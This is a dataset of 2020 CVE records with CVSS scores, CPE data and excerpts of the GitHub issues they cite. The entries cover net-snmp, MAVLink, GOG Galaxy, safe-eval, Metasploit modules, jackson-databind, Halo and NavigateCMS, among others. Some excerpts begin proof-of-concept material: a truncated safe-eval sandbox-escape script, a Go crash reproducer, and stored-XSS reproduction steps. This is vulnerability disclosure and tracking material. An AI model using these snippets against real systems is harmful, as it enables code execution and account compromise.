"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966599"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/net... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:net-snmp:net-snmp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BD5C233-45FA-4501-8EA4-C28EC33E7460",
"versionEndExcluding": null,
"versionEndIncluding": "5.7.3",
"versionStartExclu... | [
"59"
] | 59 | https://github.com/net-snmp/net-snmp/issues/145 | [
"Third Party Advisory"
] | github.com | [
"net-snmp",
"net-snmp"
] | Dear all,
In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net-snmp.
Your deprecated bug tracker (http://www.net-snmp.org/bugs/) redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs.
We wou... | [Ticket#2020070701000015] Security issues in net-snmp | https://api.github.com/repos/net-snmp/net-snmp/issues/145/comments | 8 | 2020-07-09T09:32:21Z | 2020-09-21T04:05:51Z | https://github.com/net-snmp/net-snmp/issues/145 | 653,914,163 | 145 | 1,391 |
CVE-2020-10283 | 2020-08-20T09:15:11.140 | The Micro Air Vehicle Link (MAVLink) protocol presents authentication mechanisms on its version 2.0 however according to its documentation, in order to maintain backwards compatibility, GCS and autopilot negotiate the version via the AUTOPILOT_VERSION message. Since this negotiation depends on the answer, an attacker m... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@aliasrobotics.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/aliasrobotics/RVD/issues/3316"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dronecode:micro_air_vehicle_link:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F56CC677-E829-48A5-B01B-9B33F13C084B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"v... | [
"288"
] | 288 | https://github.com/aliasrobotics/RVD/issues/3316 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"aliasrobotics",
"RVD"
] | ```yaml
id: 3316
title: 'RVD#3316: No authentication in MAVLink protocol'
type: vulnerability
description: The Micro Air Vehicle Link (MAVLink) protocol presents no authentication
mechanism on its version 1.0 (nor authorization) whichs leads to a variety of attacks
including identity spoofing, unauthorized a... | RVD#3316: No authentication in MAVLink protocol | https://api.github.com/repos/aliasrobotics/RVD/issues/3316/comments | 22 | 2020-06-30T17:20:40Z | 2021-11-04T16:22:48Z | https://github.com/aliasrobotics/RVD/issues/3316 | 648,358,479 | 3,316 | 1,392 |
CVE-2020-24574 | 2020-08-21T04:15:10.787 | The client (aka GalaxyClientService.exe) in GOG GALAXY through 2.0.41 (as of 12:58 AM Eastern, 9/26/21) allows local privilege escalation from any authenticated user to SYSTEM by instructing the Windows service to execute arbitrary commands. This occurs because the attacker can inject a DLL into GalaxyClient.exe, defea... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 6.9,
"confidentialityImpact": "COMPL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jtesta/gog_galaxy_client_service_poc"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gog:galaxy:*:*:*:*:*:windows:*:*",
"matchCriteriaId": "5314B5BB-CE6A-4BD1-B9CE-ACA13D7A7349",
"versionEndExcluding": null,
"versionEndIncluding": "2.0.41",
"versionStartExclu... | [
"798"
] | 798 | https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1#issuecomment-926932218 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jtesta",
"gog_galaxy_client_service_poc"
] | ....Just in case anyone was wondering, the PoC still works on GOG Galaxy 2.0.35 (last tested as of time of wriitng this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system.
GOG has yet to fix the underlying issue, it seems. CVE-2020-2... | PoC status update | https://api.github.com/repos/jtesta/gog_galaxy_client_service_poc/issues/1/comments | 17 | 2021-01-22T23:22:15Z | 2025-01-20T03:14:04Z | https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1 | 792,366,903 | 1 | 1,393 |
CVE-2020-7710 | 2020-08-21T10:15:11.460 | This affects all versions of package safe-eval. It is possible for an attacker to run an arbitrary command on the host machine. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/hacksparrow/safe-eval/issues/19"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "40E74BFD-022E-4056-878F-0FA8BA26FDAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"94"
] | 94 | https://github.com/hacksparrow/safe-eval/issues/19 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"hacksparrow",
"safe-eval"
] | The following script can lead to safe-eval sandbox escape (node `v12.13.0`):
```javascript
const safeEval = require('safe-eval');
const theFunction = function() {
const bad = new Error();
bad.__proto__ = null;
bad.stack = {
match(outer) {
throw outer.constructor.constructor("return p... | Sandbox Escape | https://api.github.com/repos/hacksparrow/safe-eval/issues/19/comments | 1 | 2020-02-28T07:50:28Z | 2020-08-03T05:42:15Z | https://github.com/hacksparrow/safe-eval/issues/19 | 572,587,043 | 19 | 1,394 |
CVE-2020-10290 | 2020-08-21T15:15:12.540 | Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can compromise the overall robot operations as demonstrated in our video. In our PoC we demonstrate how a malicious actor could 'cook' a custo... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",... | [
{
"source": "cve@aliasrobotics.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/aliasrobotics/RVD/issues/1495"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sintef:urx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D90D07FA-3643-4EBD-A0B3-7A5915E5216B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | [
"269"
] | 269 | https://github.com/aliasrobotics/RVD/issues/1495 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"aliasrobotics",
"RVD"
] | ```yaml
id: 1495
title: 'RVD#1495: Universal Robots URCaps execute with unbounded privileges'
type: vulnerability
description: Universal Robots controller execute URCaps (zip files containing Java-powered
applications) without any permission restrictions and a wide API that presents many
primitives that can c... | RVD#1495: Universal Robots URCaps execute with unbounded privileges | https://api.github.com/repos/aliasrobotics/RVD/issues/1495/comments | 2 | 2020-04-03T15:49:12Z | 2020-08-21T15:02:32Z | https://github.com/aliasrobotics/RVD/issues/1495 | 593,476,197 | 1,495 | 1,395 |
CVE-2020-7711 | 2020-08-23T14:15:09.573 | This affects all versions of package github.com/russellhaering/goxmldsig. There is a crash on nil-pointer dereference caused by sending malformed XML signatures. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/russellhaering/goxmldsig/issues/48"
},
{
"source": "report@snyk.io",
"tags": [
"Broken Link"
],
"url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERI... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:goxmldsig_project:goxmldsig:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6E25D60-FAC6-4DD2-9AF6-5034CAB84901",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"476"
] | 476 | https://github.com/russellhaering/goxmldsig/issues/48 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"russellhaering",
"goxmldsig"
] | See https://github.com/russellhaering/gosaml2/issues/59 for background.
Program which exhibits the issue:
```go
package main
import (
"crypto/x509"
"encoding/base64"
"encoding/xml"
"fmt"
"time"
saml2 "github.com/russellhaering/gosaml2"
"github.com/russellhaering/gosaml2/types"
dsig "github.c... | Crash on nil-pointer dereference with malformed input | https://api.github.com/repos/russellhaering/goxmldsig/issues/48/comments | 10 | 2019-08-14T10:53:49Z | 2021-08-28T03:19:01Z | https://github.com/russellhaering/goxmldsig/issues/48 | 480,612,498 | 48 | 1,396 |
CVE-2020-14043 | 2020-08-24T16:15:10.640 | ** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Side Request Forgery (CSRF) vulnerability was found in Codiad v1.7.8 and later. The request to download a plugin from the marketplace is only available to admin users and it isn't CSRF protected in components/market/controller.php. This might cause admins to make a vuln... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://advisory.checkmarx.net/advisory/CX-2020-4279"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Codiad/Codiad/blob/master/REA... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codiad:codiad:*:*:*:*:*:*:*:*",
"matchCriteriaId": "43C9171C-2531-46A0-9952-70E476FB6A46",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"352"
] | 352 | https://github.com/Codiad/Codiad/issues/1122 | [
"Third Party Advisory"
] | github.com | [
"Codiad",
"Codiad"
] | Hello,
Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information.
ScaAppSec@checkmarx.com
Best regards,
Y... | Multiple vulnerabilities that can result in RCE | https://api.github.com/repos/Codiad/Codiad/issues/1122/comments | 1 | 2020-06-03T15:02:11Z | 2020-08-25T06:11:19Z | https://github.com/Codiad/Codiad/issues/1122 | 630,072,524 | 1,122 | 1,397 |
CVE-2020-7376 | 2020-08-24T19:15:10.713 | The Metasploit Framework module "post/osx/gather/enum_osx module" is affected by a relative path traversal vulnerability in the get_keychains method which can be exploited to write arbitrary files to arbitrary locations on the host filesystem when the module is run on a malicious host. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE"... | [
{
"source": "cve@rapid7.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rapid7/metasploit-framework/issues/14008"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE440BD0-9B8F-49A8-BF37-85B8DC3CEDCB",
"versionEndExcluding": "6.0.3",
"versionEndIncluding": null,
"versionStartExclu... | [
"22"
] | 22 | https://github.com/rapid7/metasploit-framework/issues/14008 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"rapid7",
"metasploit-framework"
] | On the victim-soon-to-be-attacker host - create some fun executables :
```
root@linux-mint-19-3-amd64:/bin# ls -la /bin/cat*
-rwxr-xr-x 1 root root 128 Aug 17 19:37 /bin/cat
-rwxr-xr-x 1 root root 35064 Aug 17 19:17 /bin/cat.backup
root@linux-mint-19-3-amd64:/bin# ls -la /usr/bin/sudo*
-rwsr-xr-x 1 root roo... | post/osx/gather/enum_osx: permits remote command execution on Metasploit host | https://api.github.com/repos/rapid7/metasploit-framework/issues/14008/comments | 4 | 2020-08-17T10:00:48Z | 2020-08-21T15:06:10Z | https://github.com/rapid7/metasploit-framework/issues/14008 | 680,108,459 | 14,008 | 1,398 |
CVE-2020-7377 | 2020-08-24T19:15:10.837 | The Metasploit Framework module "auxiliary/admin/http/telpho10_credential_dump" module is affected by a relative path traversal vulnerability in the untar method which can be exploited to write arbitrary files to arbitrary locations on the host file system when the module is run on a malicious HTTP server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@rapid7.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/rapid7/metasploit-framework/issues/14015"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6C57088-B29C-4383-BC60-42ECE0C9326C",
"versionEndExcluding": "6.0.3",
"versionEndIncluding": null,
"versionStartExclu... | [
"22"
] | 22 | https://github.com/rapid7/metasploit-framework/issues/14015 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"rapid7",
"metasploit-framework"
] | The `untar` method in the `auxiliary/admin/http/telpho10_credential_dump` module is vulnerable to directory traversal resulting in arbitrary file write.
This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho10 system.
# Vulnerable Cod... | auxiliary/admin/http/telpho10_credential_dump: `untar` method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host | https://api.github.com/repos/rapid7/metasploit-framework/issues/14015/comments | 3 | 2020-08-18T08:48:55Z | 2020-08-25T13:35:54Z | https://github.com/rapid7/metasploit-framework/issues/14015 | 680,816,703 | 14,015 | 1,399 |
CVE-2020-24616 | 2020-08-25T18:15:11.133 | FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2814"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8395437B-348F-4291-B79B-2794C1A0B560",
"versionEndExcluding": "2.9.10.6",
"versionEndIncluding": null,
"versi... | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2814 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | Another gadget type(s) reported regarding class(es) of `br.com.anteros:Anteros-DBCP` library.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Mitre id: CVE-2020-24616
Reporter(s): ChenZhaojun (Security Team of Aliba... | Block one more gadget type (Anteros-DBCP, CVE-2020-24616) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2814/comments | 2 | 2020-08-11T02:05:43Z | 2020-12-02T03:57:22Z | https://github.com/FasterXML/jackson-databind/issues/2814 | 676,524,402 | 2,814 | 1,400 |
CVE-2020-16197 | 2020-08-25T19:15:12.500 | An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6529"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6530"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"295"
] | 295 | https://github.com/OctopusDeploy/Issues/issues/6529 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | [CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197)
## Description
A credential scoped to one tenant could be used to affect another tenant in certain circumstances.
Effectively, the logic was previously, "A credential may be used to access this target if it is applicable to any tenant on this ta... | Certificates and accounts associated with tenanted deployment targets are not validated | https://api.github.com/repos/OctopusDeploy/Issues/issues/6529/comments | 0 | 2020-08-23T12:21:15Z | 2022-01-19T01:01:09Z | https://github.com/OctopusDeploy/Issues/issues/6529 | 684,173,453 | 6,529 | 1,401 |
CVE-2020-16197 | 2020-08-25T19:15:12.500 | An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6529"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6530"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"295"
] | 295 | https://github.com/OctopusDeploy/Issues/issues/6530 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | This is the 2020.2.18 version of https://github.com/OctopusDeploy/Issues/issues/6529
[CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197)
## Description
A credential scoped to one tenant could be used to affect another tenant in certain circumstances.
Effectively, the logic was previously, "A c... | Certificates and accounts associated with tenanted deployment targets are not validated | https://api.github.com/repos/OctopusDeploy/Issues/issues/6530/comments | 0 | 2020-08-23T12:30:12Z | 2022-01-19T01:01:57Z | https://github.com/OctopusDeploy/Issues/issues/6530 | 684,174,811 | 6,530 | 1,402 |
CVE-2020-16197 | 2020-08-25T19:15:12.500 | An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6529"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6530"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"295"
] | 295 | https://github.com/OctopusDeploy/Issues/issues/6531 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | This is the 2020.1.22 version of https://github.com/OctopusDeploy/Issues/issues/6529
[CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197)
## Description
A credential scoped to one tenant could be used to affect another tenant in certain circumstances.
Effectively, the logic was previously, "A c... | Certificates and accounts associated with tenanted deployment targets are not validated | https://api.github.com/repos/OctopusDeploy/Issues/issues/6531/comments | 0 | 2020-08-23T12:31:17Z | 2020-08-26T22:46:20Z | https://github.com/OctopusDeploy/Issues/issues/6531 | 684,174,965 | 6,531 | 1,403 |
CVE-2020-19005 | 2020-08-25T22:15:11.537 | zrlog v2.1.0 has a vulnerability with the permission check. If admin account is logged in, other unauthorized users can download the database backup file directly. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/94fzb/zrlog/commit/b2b4415e2e59b6f18b0a62b633e71c96d63c43ba"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zrlog:zrlog:2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9405174E-51EC-48F0-BF91-16021060B7FE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"863"
] | 863 | https://github.com/94fzb/zrlog/issues/48 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"94fzb",
"zrlog"
] | 1、There is a vulnerability with the permission check。If admin account is logged in, other unauthorized users can download the database backup file directly。The getuser() function always gets the value
PluginHandler.java
<img width="1048" alt="101" src="https://user-images.githubusercontent.com/25348551/55862980-300... | Unauthorized access to download database backup files | https://api.github.com/repos/94fzb/zrlog/issues/48/comments | 3 | 2019-04-07T11:14:36Z | 2019-04-14T01:34:27Z | https://github.com/94fzb/zrlog/issues/48 | 430,132,232 | 48 | 1,404 |
CVE-2020-19007 | 2020-08-26T14:15:10.637 | Halo blog 1.2.0 allows users to submit comments on blog posts via /api/content/posts/comments. The javascript code supplied by the attacker will then execute in the victim user's browser. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/halo-dev/halo/issues/547"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:halo:halo:1.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DB3E9501-E452-4B2A-AD4A-D803C8A9C40C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"79"
] | 79 | https://github.com/halo-dev/halo/issues/547 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"halo-dev",
"halo"
] | <!--
你好!感谢你正在考虑为 Halo 提交一个 bug。请花一点点时间尽量详细地回答以下基础问题。
谢谢!
-->
<!--
请确认你已经做了下面这些事情,若 bug 还是未解决,那么请尽可详细地描述你的问题。
- 我已经安装了最新版的 Halo
- 我已经搜索了已有的 Issues 列表中有关的信息
- 我已经搜索了论坛中有关的信息:https://bbs.halo.run
- 我已经阅读了 Halo 的 FAQ:https://halo.run/archives/other-faq
-->
## Environment
Server Version:1.... | Stored xss on Halo blog | https://api.github.com/repos/halo-dev/halo/issues/547/comments | 2 | 2020-02-08T08:43:59Z | 2020-03-16T09:15:11Z | https://github.com/halo-dev/halo/issues/547 | 561,990,601 | 547 | 1,405 |
CVE-2020-23654 | 2020-08-26T17:15:12.693 | NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) via the module "Shop." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NavigateCMS/Navigate-CMS/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"79"
] | 79 | https://github.com/NavigateCMS/Navigate-CMS/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NavigateCMS",
"Navigate-CMS"
] | **/**Describe the bug**/**
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Shop" feature Navigate
**/**To Reproduce**/**
Steps to reproduce the behavior:
1. Login into the panel
2. Go to 'navigate/navigate.php?fid=dashboard'
3. Go to Moudle "Shop"
4. Chose:
- Go to ... | Cross Site Script Vulnerability on module "Shop" in NavigateCMS 2.9 | https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/10/comments | 2 | 2020-06-17T14:24:49Z | 2020-06-18T08:07:07Z | https://github.com/NavigateCMS/Navigate-CMS/issues/10 | 640,486,199 | 10 | 1,406 |
CVE-2020-23655 | 2020-08-26T17:15:12.770 | NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Configuration." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NavigateCMS/Navigate-CMS/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"79"
] | 79 | https://github.com/NavigateCMS/Navigate-CMS/issues/11 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NavigateCMS",
"Navigate-CMS"
] | **/Describe the bug/**
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Configuration" feature Navigate
**/To Reproduce/**
Steps to reproduce the behavior:
1. Login into the panel
2. Go to '/navigate/navigate.php?fid=about'
3. Go to Moudle "Configuration"
4. Chose:
